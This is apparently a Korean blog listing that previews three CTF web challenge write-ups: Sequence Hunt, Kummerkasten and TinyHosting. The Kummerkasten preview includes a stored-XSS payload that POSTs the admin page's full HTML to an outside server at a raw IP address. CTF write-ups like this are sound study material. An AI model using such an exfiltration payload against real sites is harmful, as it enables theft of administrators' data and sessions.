do9dark

- Sequence Hunt http://136.243.194.36:18888 send them as GET parameters here 를 선택하면 아래 페이지로 이동되고 인자가 없다는 메시지를 볼 수 있다. val0 파라미터 인자를 만들어주고 다시 접근해보면 val1 인자가 없다는 메시지를 확인할 수 있고 동일하게 인자를 만들어서 접근해준다. 인자를 다 만들어주고 나면 접속한 사용자의 IP 주소와 함께 값이 틀렸다는 메시지를 확인할 수 있다. 다시 메인 페이지로 돌아가서 get some info about you here 를 선택하면 아래 페이지로 이동되고 요청한 횟수를 확인할 수 있다. 그리고, Someone sent me this 를 선택해보면 Timing attack(https://en.wiki..

- Kummerkasten this site를 눌러보면 아래 사이트로 이동한다.해당 사이트는 관리자에게 메시지를 보낼 수 있는 기능이 있는 사이트이다. 간단하게 메시지를 전송 전송 결과로는 의미있는 정보를 얻기가 힘들다. Your Message 부분에 스크립트를 삽입하여 해당 메시지를 받아보는 관리자가 보는 페이지를 개인 서버 쪽으로 전송하도록 처리하였다.123456789$.ajax({ type: "POST", url: "http://14.36.23.78:1337/pwn", data: { 'data':document.documentElement.outerHTML }});Colored by Color Scriptercs 서버 쪽에서는 전송된 내용을 받아서 처리할 수 있도록 파이썬으로 아래 코드를 실행해놓은..

- TinyHosting 문제 서버가 닫혀있어서 캐쉬를 긁어모아서 개인 서버에 비슷하게 구축하였다.http://rnd.do9.kr/tiny/ 소스를 보면 주석으로 처리된 값을 확인할 수 있다. 주석으로 처리된 값을 파라미터로 전송하게 되면 index.php 소스 코드를 볼 수 있다. index.php12345678910111213141516171819202122232425262728293031323334353637383940 TinyHosting Filename: Content: Create! Colored by Color Scriptercs 소스 코드를 보면 REMOTE_ADDR 값과 HTTP_USER_AGENT 값을 더한 다음 SHA1으로 암호화한 값을 디렉터리 경로로 해서 index.html 파일이..